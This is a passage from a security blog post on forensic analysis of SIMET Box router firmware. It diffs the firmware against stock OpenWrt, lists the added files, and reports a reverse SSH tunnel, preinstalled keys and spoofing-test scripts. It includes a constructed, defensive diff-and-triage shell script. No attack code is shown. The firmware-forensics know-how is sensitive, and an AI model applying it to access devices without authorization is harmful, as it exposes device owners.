<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI1ALNsZ95REd0O8CymeORCfuUglqJ2pXZfCzW8P8-aWhpl6PfOxHRVz0aPkoIBvSwiweUXEVO-oGvGQ9AjvYsb0k5MvVyqLuA0MLo3DpP2RohcXX1tVm_1RbX-RBEU2rJYVFeILHGCRuE/s1600/diff1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI1ALNsZ95REd0O8CymeORCfuUglqJ2pXZfCzW8P8-aWhpl6PfOxHRVz0aPkoIBvSwiweUXEVO-oGvGQ9AjvYsb0k5MvVyqLuA0MLo3DpP2RohcXX1tVm_1RbX-RBEU2rJYVFeILHGCRuE/s400/diff1.PNG" style="cursor: move;" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZMQEWuplG-HP9YhXqb_Mw5jZUUAtEQqgwxwQpgCiw6-52uZyOu69eiuJjeWeOPuKl5SWVkQgx02fkUXIW0d2NWLxHMkY4oN1D_NuFf7upUAakGNryc5Z0OGy99d3MLlpTTcRaAWLZvqAr/s1600/diff3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZMQEWuplG-HP9YhXqb_Mw5jZUUAtEQqgwxwQpgCiw6-52uZyOu69eiuJjeWeOPuKl5SWVkQgx02fkUXIW0d2NWLxHMkY4oN1D_NuFf7upUAakGNryc5Z0OGy99d3MLlpTTcRaAWLZvqAr/s320/diff3.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj3SA-jO-AIELhylQsKgjEYD84VtL0PV_lBCUW06UTYtu3CVS8Q-Cn759pzkX6ZO59voFwRorC3VPbaqTSGuIERiD73CBpmC55QlHs6z6zavJ0SvhhjfYuisDqMzLOnEMH0Wrw-B_RSCDS/s1600/diff2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="499" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj3SA-jO-AIELhylQsKgjEYD84VtL0PV_lBCUW06UTYtu3CVS8Q-Cn759pzkX6ZO59voFwRorC3VPbaqTSGuIERiD73CBpmC55QlHs6z6zavJ0SvhhjfYuisDqMzLOnEMH0Wrw-B_RSCDS/s640/diff2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
There are some new init.d scripts like atualiza_arqs, autossh, miniupnpd and zabbix_agentd:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJORVMrKuLzshf_Q8eqjz3YN5Q2Nzl1wIIHY4HqGjo5Wqx3LIcG44RjmwJeeubpVzEw0MJyUAivxr9QKWZp5wfi3VDsDguRAVkZa7hg865u1NpkiK6rDrCiLZz4Ots2a_AMQO8lLDfcwU/s1600/diff4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="555" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJORVMrKuLzshf_Q8eqjz3YN5Q2Nzl1wIIHY4HqGjo5Wqx3LIcG44RjmwJeeubpVzEw0MJyUAivxr9QKWZp5wfi3VDsDguRAVkZa7hg865u1NpkiK6rDrCiLZz4Ots2a_AMQO8lLDfcwU/s640/diff4.png" width="640" /></a></div>
<br />
Lots of binaries (/bin/busybox for example) are quite similar: they may differ by a minor version or have been compiled with different build options:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95efFXSrwvWYQcNRwxz-P-khcyOymPcH93HtOi0t3zn_ei8ExOqMikNmmpsO-MqvzKxvSrq-0UnaPU0rGEDNZomm6XfkSWxkKbm4lH0m0mEDquU7kmEpS0qC_2QXdOXAZooECRneQzSq_/s1600/diff5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95efFXSrwvWYQcNRwxz-P-khcyOymPcH93HtOi0t3zn_ei8ExOqMikNmmpsO-MqvzKxvSrq-0UnaPU0rGEDNZomm6XfkSWxkKbm4lH0m0mEDquU7kmEpS0qC_2QXdOXAZooECRneQzSq_/s640/diff5.png" width="640" /></a></div>
<br />
List of files created by SIMET Box (not present in the OpenWrt base firmware), each described with <code>file</code>:<br />
<div class="code">
while read -r i ; do file "$i" ; done &lt; list.txt</div>
<div class="code">
/etc/config/autossh: ASCII text<br />
/etc/config/upnpd: ASCII text<br />
/etc/dropbear/authorized_keys: OpenSSH DSA public key<br />
/etc/dropbear/id_rsa: data<br />
/etc/hotplug.d/button/00-button: ASCII text<br />
/etc/hotplug.d/iface/20-autossh: POSIX shell script, ASCII text executable<br />
/etc/hotplug.d/iface/50-miniupnpd: POSIX shell script, ASCII text executable<br />
/etc/init.d/atualiza_arqs_simet: POSIX shell script, ASCII text executable<br />
/etc/init.d/autossh: POSIX shell script, ASCII text executable<br />
/etc/init.d/miniupnpd: POSIX shell script, ASCII text executable<br />
/etc/init.d/zabbix_agentd: POSIX shell script, ASCII text executable<br />
/etc/rc.d/S11sysctl: symbolic link to `../init.d/sysctl'<br />
/etc/rc.d/S19firewall: symbolic link to `../init.d/firewall'<br />
/etc/rc.d/S45atualiza_arqs_simet: symbolic link to `../init.d/atualiza_arqs_simet'<br />
/etc/rc.d/S60zabbix_agentd: symbolic link to `../init.d/zabbix_agentd'<br />
/etc/rc.d/S80autossh: symbolic link to `../init.d/autossh'<br />
/etc/rc.d/S95miniupnpd: symbolic link to `../init.d/miniupnpd'<br />
/etc/uci-defaults/50-reset: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/50-reset-wps: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/50-wifi: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/99-miniupnpd: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/luci-i18n-portuguese_brazilian: POSIX shell script, UTF-8 Unicode text executable<br />
/etc/uci-defaults/luci-theme-bootstrap: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/luci-upnp: POSIX shell script, ASCII text executable<br />
/etc/zabbix_agentd.conf: ASCII text<br />
/lib/libpthread-0.9.33.2.so: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked (uses shared libs), corrupted section header size<br />
/lib/libpthread.so.0: symbolic link to `libpthread-0.9.33.2.so'<br />
/root/.ssh/known_hosts: ASCII text, with very long lines<br />
/sbin/fw3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/bin/auto_upgrade: symbolic link to `simet_tools'<br />
/usr/bin/checa_udhcpc.sh: POSIX shell script, ASCII text executable<br />
/usr/bin/get_mac_address.sh: POSIX shell script, ASCII text executable<br />
/usr/bin/simet_client: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/bin/simet_dns: symbolic link to `simet_tools'<br />
/usr/bin/simet_porta25: symbolic link to `simet_tools'<br />
/usr/bin/simet_tools: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/bin/sshreversetunnel: POSIX shell script, ASCII text executable<br />
/usr/bin/teste_spoofing.sh: POSIX shell script, ASCII text executable<br />
/usr/bin/wifionoff: POSIX shell script, ASCII text executable<br />
/usr/lib/lua/luci/controller/simet.lua: ASCII text<br />
/usr/lib/lua/luci/controller/upnp.lua: ASCII text<br />
/usr/lib/lua/luci/i18n/base.pt-br.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.ca.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.cs.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.de.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.es.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.fr.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.hu.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.it.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.ja.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.no.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.pl.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.pt-br.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.pt.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.ro.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.ru.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.vi.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.zh-cn.lmo: data<br />
/usr/lib/lua/luci/model/cbi/upnp/upnp.lua: ASCII text<br />
/usr/lib/lua/luci/sgi/uhttpd.lua: ASCII text<br />
/usr/lib/lua/luci/view/admin_status/index/upnp.htm: ASCII text<br />
/usr/lib/lua/luci/view/simet/simet.htm: HTML document, UTF-8 Unicode text<br />
/usr/lib/lua/luci/view/themes/bootstrap/footer.htm: HTML document, ASCII text<br />
/usr/lib/lua/luci/view/themes/bootstrap/header.htm: HTML document, ASCII text<br />
/usr/lib/lua/luci/view/upnp_status.htm: HTML document, ASCII text<br />
/usr/lib/opkg/info/autossh.conffiles: ASCII text<br />
/usr/lib/opkg/info/autossh.control: ASCII text<br />
/usr/lib/opkg/info/autossh.list: ASCII text<br />
/usr/lib/opkg/info/hping3.control: ASCII text<br />
/usr/lib/opkg/info/hping3.list: ASCII text<br />
/usr/lib/opkg/info/libip6tc.control: ASCII text<br />
/usr/lib/opkg/info/libip6tc.list: ASCII text<br />
/usr/lib/opkg/info/libnfnetlink.control: ASCII text<br />
/usr/lib/opkg/info/libnfnetlink.list: ASCII text<br />
/usr/lib/opkg/info/libopenssl.control: ASCII text<br />
/usr/lib/opkg/info/libopenssl.list: ASCII text<br />
/usr/lib/opkg/info/libpcap.control: ASCII text<br />
/usr/lib/opkg/info/libpcap.list: ASCII text<br />
/usr/lib/opkg/info/libpthread.control: ASCII text<br />
/usr/lib/opkg/info/libpthread.list: ASCII text<br />
/usr/lib/opkg/info/luci-app-simet.control: ASCII text<br />
/usr/lib/opkg/info/luci-app-simet.list: ASCII text<br />
/usr/lib/opkg/info/luci-app-upnp.control: ASCII text<br />
/usr/lib/opkg/info/luci-app-upnp.list: ASCII text<br />
/usr/lib/opkg/info/luci-i18n-portuguese-brazilian.control: ASCII text<br />
/usr/lib/opkg/info/luci-i18n-portuguese-brazilian.list: ASCII text<br />
/usr/lib/opkg/info/luci-sgi-uhttpd.control: ASCII text<br />
/usr/lib/opkg/info/luci-sgi-uhttpd.list: ASCII text<br />
/usr/lib/opkg/info/luci-theme-bootstrap.control: ASCII text<br />
/usr/lib/opkg/info/luci-theme-bootstrap.list: ASCII text<br />
/usr/lib/opkg/info/miniupnpd.conffiles: ASCII text<br />
/usr/lib/opkg/info/miniupnpd.control: ASCII text<br />
/usr/lib/opkg/info/miniupnpd.list: ASCII text<br />
/usr/lib/opkg/info/simet-base-files.control: ASCII text<br />
/usr/lib/opkg/info/simet-base-files.list: ASCII text<br />
/usr/lib/opkg/info/simet-client.control: ASCII text<br />
/usr/lib/opkg/info/simet-client.list: ASCII text<br />
/usr/lib/opkg/info/simet-tools.control: ASCII text<br />
/usr/lib/opkg/info/simet-tools.list: ASCII text<br />
/usr/lib/opkg/info/uhttpd-mod-lua.control: ASCII text<br />
/usr/lib/opkg/info/uhttpd-mod-lua.list: ASCII text<br />
/usr/lib/opkg/info/zabbix-agentd.control: ASCII text<br />
/usr/lib/opkg/info/zabbix-agentd.list: ASCII text<br />
/usr/lib/opkg/info/zlib.control: ASCII text<br />
/usr/lib/opkg/info/zlib.list: ASCII text<br />
/usr/lib/libcrypto.so.1.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libip6tc.so: symbolic link to `libip6tc.so.0.0.0'<br />
/usr/lib/libip6tc.so.0: symbolic link to `libip6tc.so.0.0.0'<br />
/usr/lib/libip6tc.so.0.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libjson-c.so.2: symbolic link to `libjson-c.so.2.0.1'<br />
/usr/lib/libjson-c.so.2.0.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libnfnetlink.so.0: symbolic link to `libnfnetlink.so.0.2.0'<br />
/usr/lib/libnfnetlink.so.0.2.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libpcap.so: symbolic link to `libpcap.so.1.1'<br />
/usr/lib/libpcap.so.1.1: symbolic link to `libpcap.so.1.1.1'<br />
/usr/lib/libpcap.so.1.1.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libssl.so.1.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libz.so: symbolic link to `libz.so.1.2.7'<br />
/usr/lib/libz.so.1: symbolic link to `libz.so.1.2.7'<br />
/usr/lib/libz.so.1.2.7: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/uhttpd_lua.so: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/sbin/autossh: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/sbin/hping3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/sbin/miniupnpd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/sbin/zabbix_agentd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/share/libiwinfo/hardware.txt: ASCII text<br />
/usr/share/miniupnpd/firewall.include: POSIX shell script, ASCII text executable<br />
/www/luci-static/bootstrap/cascade.css: assembler source, ASCII text<br />
/www/luci-static/bootstrap/favicon.ico: MS Windows icon resource - 1 icon<br />
/www/luci-static/bootstrap/html5.js: HTML document, ASCII text, with very long lines<br />
/www/simet/ceptro.png: PNG image data, 78 x 30, 8-bit colormap, non-interlaced<br />
/www/simet/cgi.png: PNG image data, 46 x 30, 8-bit colormap, non-interlaced<br />
/www/simet/nic.png: PNG image data, 47 x 25, 8-bit colormap, non-interlaced<br />
/www/simet/nonet.htm: UTF-8 Unicode text<br />
/www/simet/offline.jpg: JPEG image data, EXIF standard<br />
/www/simet/simetbox_minilogo.png: PNG image data, 111 x 23, 8-bit colormap, non-interlaced<br />
/www/simet/view_tab.css: assembler source, ASCII text<br />
/www/simet/view_tab.js: UTF-8 Unicode text, with very long lines</div>
<br />
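To automate the diff-and-<code>file</code> step above for any two extracted trees, here is an added example (not code from the original post or from SIMET/NIC.br): it lists created, removed and modified files between a stock OpenWrt root and the vendor root, then flags the paths a reviewer should open first (init scripts, rc.d links, cron entries, SSH keys, UCI config). The two trees it builds are constructed stand-ins for the real squashfs-root directories, and it assumes <code>sha256sum</code>, <code>comm</code>, <code>readlink</code> and <code>file</code> are on the PATH.<br />

```shell
#!/bin/sh
# Added example, not code from the original post or from SIMET/NIC.br.
# Diffs a vendor firmware tree against the matching stock OpenWrt tree
# (both normally produced by "binwalk -Me") and reports created, removed
# and modified files, flagging the ones worth opening first.
# The two trees built below are CONSTRUCTED stand-ins for squashfs-root dirs.
set -u

hash_file() { sha256sum "$1" | cut -d' ' -f1; }

# Sorted list of regular files and symlinks, as absolute paths inside the tree.
list_tree() { (cd "$1" && find . \( -type f -o -type l \) | sed 's|^\./|/|' | sort); }

# diff_trees BASE CUSTOM -> one "created|removed|modified <path>" line per change
diff_trees() {
    base=$1; custom=$2
    list_tree "$base" > "$WORK/base.lst"
    list_tree "$custom" > "$WORK/custom.lst"
    comm -13 "$WORK/base.lst" "$WORK/custom.lst" | sed 's/^/created /'
    comm -23 "$WORK/base.lst" "$WORK/custom.lst" | sed 's/^/removed /'
    # Paths present in both trees: compare symlink targets or content hashes.
    comm -12 "$WORK/base.lst" "$WORK/custom.lst" | while IFS= read -r p; do
        if [ -L "$base$p" ] || [ -L "$custom$p" ]; then
            [ "$(readlink "$base$p")" = "$(readlink "$custom$p")" ] || echo "modified $p"
        elif [ "$(hash_file "$base$p")" != "$(hash_file "$custom$p")" ]; then
            echo "modified $p"
        fi
    done
}

# triage CUSTOM < report: mark paths that change boot, remote access or
# scheduling, and describe each surviving file with file(1) as the post does.
triage() {
    custom=$1
    while read -r kind path; do
        case "$path" in
            /etc/init.d/*|/etc/rc.d/*|/etc/crontabs/*|/etc/dropbear/*|/root/.ssh/*|/etc/config/*)
                flag=REVIEW ;;
            *) flag=------ ;;
        esac
        desc=
        [ "$kind" = removed ] || desc=$(file -b "$custom$path" 2>/dev/null || true)
        printf '%s %-8s %-32s %s\n' "$flag" "$kind" "$path" "$desc"
    done
}

# --- constructed sample trees (stand-ins for the two squashfs-root dirs) ---
WORK=$(mktemp -d)
BASE=$WORK/base
CUSTOM=$WORK/custom
mk() { mkdir -p "$(dirname "$1")"; printf '%s\n' "$2" > "$1"; }

# Stock image: busybox, one init script with its rc.d link, a banner.
mk "$BASE/bin/busybox" 'busybox build A'
mk "$BASE/etc/init.d/sysctl" '#!/bin/sh /etc/rc.common'
mk "$BASE/etc/banner" 'OpenWrt'
mkdir -p "$BASE/etc/rc.d" && ln -s ../init.d/sysctl "$BASE/etc/rc.d/S11sysctl"

# Vendor image: rebuilt busybox, a new autossh service, a pre-installed
# SSH key (placeholder value), banner dropped.
mk "$CUSTOM/bin/busybox" 'busybox build B'
mk "$CUSTOM/etc/init.d/sysctl" '#!/bin/sh /etc/rc.common'
mk "$CUSTOM/etc/init.d/autossh" '#!/bin/sh /etc/rc.common'
mk "$CUSTOM/etc/dropbear/authorized_keys" 'ssh-dss PLACEHOLDER-KEY'
mkdir -p "$CUSTOM/etc/rc.d"
ln -s ../init.d/sysctl "$CUSTOM/etc/rc.d/S11sysctl"
ln -s ../init.d/autossh "$CUSTOM/etc/rc.d/S80autossh"

# Expected: three created, one removed, one modified; sysctl is unchanged.
# $WORK is left in place so the two trees and the report can be inspected.
diff_trees "$BASE" "$CUSTOM" | triage "$CUSTOM"
```

Run it against real trees by pointing BASE and CUSTOM at the two squashfs-root directories instead of the constructed ones; the three REVIEW lines in the sample correspond to the kind of entries (new init script, rc.d link, authorized_keys) the post goes on to examine.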
<div style="text-align: left;">
<span style="font-family: inherit;">This simple technique is quite useful for forensic analysis of embedded devices, as it gives you a whitelist of known binaries and config files. </span>It is important to review both created and modified files, but I'll focus on the ones listed above. <span style="font-family: inherit;">Each binary and config file can be reviewed </span>separately, which turns up interesting entries such as:</div>
<div style="text-align: left;">
<br /></div>
<ul>
<li>SSH reverse tunnel settings and authorized_keys:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-LqVdGt22JIQJy8Bm6PJRpcR3xegfWxnbKTez1SCTn4yHC0_uAczkhfKeBsdCF9eS314wu3kWPVkTSKvAAN44gNWLvmqe-_V2yBYPoKyEPBfU8mhPKP50z1TnAowCpX_SALRhnLVi13J3/s1600/p1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-LqVdGt22JIQJy8Bm6PJRpcR3xegfWxnbKTez1SCTn4yHC0_uAczkhfKeBsdCF9eS314wu3kWPVkTSKvAAN44gNWLvmqe-_V2yBYPoKyEPBfU8mhPKP50z1TnAowCpX_SALRhnLVi13J3/s640/p1.png" width="640" /></a></div>
<ul>
<li>Password-changing scripts and iptables rules:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwegycVDEmcQ9XQU3OUXdwq-3aB4wvyKJZvE8Eh60xAQwIXo2z4e9HOrY8_kUfcKUIVaM5u9dJgNdImVTtw-zqL9R7pxL2gw0K9Yr3A9YTUbQ_hNHnKYJ1r-dselM9ZKLJAjolp1_uJF3e/s1600/p2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwegycVDEmcQ9XQU3OUXdwq-3aB4wvyKJZvE8Eh60xAQwIXo2z4e9HOrY8_kUfcKUIVaM5u9dJgNdImVTtw-zqL9R7pxL2gw0K9Yr3A9YTUbQ_hNHnKYJ1r-dselM9ZKLJAjolp1_uJF3e/s640/p2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<ul>
<li style="text-align: left;">The device management starting page has an external iframe and users are identified by their MAC Address via HTTP GET requests:</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl2J7-Qbh0_y9ehyOyQbztl24bMc9hHYEw2FtUMRllWOTfIT3tPrzgCdu6PGqtGwpino2ojO9ykYq2wThWIpQcHntSIcU1iYLL9flphDvUX8xvvAAUQUG1-GSWzTOcxynohC9zi-Zpa7nD/s1600/p3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl2J7-Qbh0_y9ehyOyQbztl24bMc9hHYEw2FtUMRllWOTfIT3tPrzgCdu6PGqtGwpino2ojO9ykYq2wThWIpQcHntSIcU1iYLL9flphDvUX8xvvAAUQUG1-GSWzTOcxynohC9zi-Zpa7nD/s640/p3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>Cronjobs to test external access to port 25 and if the ISP allows IP spoofing:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif2u3gbACrlMdyuTZiZDwu7cKAc6U5uZ8x1HdZWJh4mVxw9w04HXh7KeQGwzgf_ECoTtUERAWezr86OY7ESD_J5jvVH6K8QhGdFW5uT2_9rSX_PMFt1sjxVUh3dpKRFbu31yfybeT3yQ8t/s1600/p5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif2u3gbACrlMdyuTZiZDwu7cKAc6U5uZ8x1HdZWJh4mVxw9w04HXh7KeQGwzgf_ECoTtUERAWezr86OY7ESD_J5jvVH6K8QhGdFW5uT2_9rSX_PMFt1sjxVUh3dpKRFbu31yfybeT3yQ8t/s640/p5.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<ul>
<li><span style="text-align: left;">Script using hping3 to test if the user's ISP allows packet spoofing:</span></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPqdjy1Rgap1Ri3gvP4gGYNxds111cM4HEabeXPLGEL-BkVacgdykBlrpaNu1aH8GV1uzil49J9U4ObFX4MqAUQgZ3U1EgorFtlaF97RpsdaX5q4wwq_Yu1uoxagIzV7P9JeocCD2ay44X/s1600/p4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPqdjy1Rgap1Ri3gvP4gGYNxds111cM4HEabeXPLGEL-BkVacgdykBlrpaNu1aH8GV1uzil49J9U4ObFX4MqAUQgZ3U1EgorFtlaF97RpsdaX5q4wwq_Yu1uoxagIzV7P9JeocCD2ay44X/s640/p4.png" width="640" /></a></div>
<ul>
<li>Zabbix agent settings:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeeKlpwF7oPDONSoeF7Z9TcBwgk11vwBajh2DdepcLrblI7IA0lwf3ucyQ25_OGbOROcklGECti3zRArEk742IX8zTs8svTxBeM1pdRtsUUuTIAG8zlgpFkEy3ue-MjZoJ1W-gX7VkBmcn/s1600/p6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeeKlpwF7oPDONSoeF7Z9TcBwgk11vwBajh2DdepcLrblI7IA0lwf3ucyQ25_OGbOROcklGECti3zRArEk742IX8zTs8svTxBeM1pdRtsUUuTIAG8zlgpFkEy3ue-MjZoJ1W-gX7VkBmcn/s640/p6.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As quick advice to the SIMET engineers: it would be nice to have HTTPS for those external queries, and a bit more transparency about what the equipment does internally, who is able to access it (whose authorized_keys are those?), which external IP addresses it communicates with and what information is being collected. Securing SOHO modems is very important, especially here in Brazil where many recent attacks have targeted these devices (<a href="https://twitter.com/assolini">Fabio Assolini's</a> talk "<a href="http://www.securelist.com/en/blog/208193852/The_tale_of_one_thousand_and_one_DSL_modems">The tale of one thousand and one DSL modems</a>" detailed this a year ago).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="text-align: start;">In the next post I'll detail how to run those MIPS32 binaries in a virtual environment using QEMU and analyze some of the files with IDA Pro.</span></div>
Bernardo Rodrigues, 2013-08-24<br />
<b>Hello world</b><br />
<br />
I just started this new blog to talk about some personal projects, exploits and hacking in general. I'm a Brazilian infosec guy interested in embedded device hacking (modems, routers etc.), webapp security, console hacking and forensics. My Twitter handle is <a href="https://twitter.com/bernardomr">@bernardomr</a>, feel free to ping me.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9PTcWZAi8sYYflp38F6ULC7lMLAyclrjRieo5yfBACXZrNsApRhjQA5CUNJIKw6SAg78kx6r2Y74aVu4t08K0ACORbHKrG-_nQZNZLemlgtSg5RXCjlmd0OIoux_yBBa3F0A9yq2Ik4D2/s1600/hworld.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9PTcWZAi8sYYflp38F6ULC7lMLAyclrjRieo5yfBACXZrNsApRhjQA5CUNJIKw6SAg78kx6r2Y74aVu4t08K0ACORbHKrG-_nQZNZLemlgtSg5RXCjlmd0OIoux_yBBa3F0A9yq2Ik4D2/s200/hworld.png" width="196" /></a></div>